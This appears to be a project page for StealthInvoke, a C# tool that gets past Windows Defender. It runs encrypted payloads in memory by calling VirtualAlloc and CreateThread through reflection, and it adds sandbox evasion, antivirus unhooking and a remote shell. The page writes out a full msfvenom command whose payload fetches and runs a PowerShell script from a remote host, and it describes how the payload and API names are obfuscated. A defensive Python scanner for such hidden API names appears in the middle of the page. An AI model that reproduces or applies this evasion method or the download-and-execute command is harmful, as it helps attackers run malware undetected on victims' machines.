πŸ‰
Gurpreet06
StealthInvoke

Executes payloads undetected in memory.


Last updated 1 year ago

StealthInvoke.exe is an application written in C# that is capable of bypassing Windows Defender. It dynamically invokes the functions VirtualAlloc and CreateThread through System.Reflection and decrypts the malicious payload in memory, so the payload never has to be written to disk where file-based detection would catch it.

Features

  • Remote Interactive shell

  • Dynamically Invoke functions like VirtualAlloc and CreateThread

  • Basic Sandbox Evasion

How the script works:

  1. Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows:

msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp

  2. Payload Encryption: Next, we encrypt the generated payload using XOR and Base64 encoding. This step is crucial, as it obfuscates the payload, making it harder for antivirus programs like Windows Defender to detect the malicious code.

  3. Function Name Obfuscation: We apply the same XOR and Base64 approach to the strings "VirtualAlloc" and "CreateThread", so the function names do not appear in plain text in the binary.

  4. Dynamic Invocation and Decryption: Finally, using System.Reflection, we resolve and invoke these functions dynamically. The encrypted payload is then decrypted directly in memory.
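From the defender's side, the XOR-plus-Base64 layer described in steps 2 and 3 is cheap to strip: any Base64 string in a sample can be decoded and tried against all 256 single-byte XOR keys, and a hit on a Win32 API name such as VirtualAlloc or CreateThread is a strong signal that the binary is hiding its use of in-memory execution APIs. The scanner below is an added example written for this page; it is not part of the StealthInvoke project and the page does not state the key length, so it assumes a single-byte XOR key applied before Base64 encoding. The names SUSPICIOUS_APIS, B64_RE, find_obfuscated_apis and the sample input are all constructed for the example.

```python
"""Analyst-side scanner for Base64-wrapped, single-byte-XOR'd API names.

Added example, not project code. Assumption: obfuscation is a single-byte
XOR applied before Base64 encoding (the page does not specify key length).
"""
import base64
import re

# API names that matter when they are hidden behind an encoding layer.
SUSPICIOUS_APIS = (
    b"VirtualAlloc",
    b"VirtualProtect",
    b"CreateThread",
    b"WriteProcessMemory",
    b"CreateRemoteThread",
)

# Runs of Base64 characters at least 12 long, with optional padding.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{12,}={0,2}")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with one single-byte key."""
    return bytes(b ^ key for b in data)


def find_obfuscated_apis(blob: bytes) -> list:
    """Return one finding per Base64 token and key that reveals an API name.

    Key 0 means the token was only Base64-encoded, with no XOR layer.
    """
    findings = []
    for match in B64_RE.finditer(blob):
        token = match.group(0)
        try:
            decoded = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for key in range(256):
            plain = xor_bytes(decoded, key)
            for api in SUSPICIOUS_APIS:
                if api in plain:
                    findings.append({
                        "offset": match.start(),
                        "token": token.decode("ascii"),
                        "key": key,
                        "api": api.decode("ascii"),
                    })
    return findings


def scan_file(path: str) -> list:
    """Scan a file on disk (a dropped .exe, a decompiled .cs dump, a memory dump)."""
    with open(path, "rb") as fh:
        return find_obfuscated_apis(fh.read())


# Constructed sample: three string literals as they might appear in a
# decompiled C# source. Only the second hides an API name (key 0x41).
SAMPLE = (
    b'string a = "SGVsbG8gV29ybGQ=";\n'                       # "Hello World"
    b'string b = "' + base64.b64encode(xor_bytes(b"VirtualAlloc", 0x41)) + b'";\n'
    b'string c = "AAAAAAAAAAAAAAAA";\n'                       # twelve zero bytes
)


if __name__ == "__main__":
    for f in find_obfuscated_apis(SAMPLE):
        layer = "Base64 only" if f["key"] == 0 else f"XOR key 0x{f['key']:02x}"
        print(f"offset {f['offset']}: {f['token']} -> {f['api']} ({layer})")
```

Because the scan is byte-oriented it works equally on a compiled assembly, a decompiler's output, or a process memory dump, and reporting key 0 separately lets you distinguish plain Base64 from the XOR layer. A false positive is only possible if a decoded token happens to contain a full API name under some key, which is rare enough that each hit is worth a manual look.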

Note:

Advanced antivirus programs may have hooked functions such as "VirtualAlloc" and "CreateThread". To execute our malicious payload, we first need to unhook them and only then load our payload into memory.

POC

πŸ‘¨β€πŸ’»
πŸ¦‚
7MB
Xor_Reflected.mp4